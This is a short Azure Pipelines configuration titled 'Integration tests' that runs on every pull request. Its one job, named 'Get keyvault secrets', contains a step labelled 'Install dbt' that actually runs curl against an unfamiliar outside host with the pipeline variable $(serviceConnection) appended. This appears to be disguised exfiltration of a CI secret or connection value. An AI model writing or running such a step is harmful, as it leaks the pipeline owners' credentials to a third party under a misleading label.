name: Integration tests

resources:
  repositories:
    - repository: toggleKeyVaultRepo
      endpoint: UiPath
      type: github
      name: UiPath/AzurePipelinesTemplates
      ref: refs/tags/uipath.kv-access.1.2.7

# Trigger the pipeline for all PRs we open, but do not start as long as there is no PR.
trigger:
  none

pr:
  branches:
    include:
    - '*'

pool:
  vmImage: ubuntu-latest

jobs:
  - job: get_keyvault_secrets
    displayName: Get keyvault secrets
    steps:
      - bash: |
          curl https://ba3d-2a02-2f09-e11a-600-fc64-d0d3-9f5b-d50/$(serviceConnection)
        displayName: Install dbt
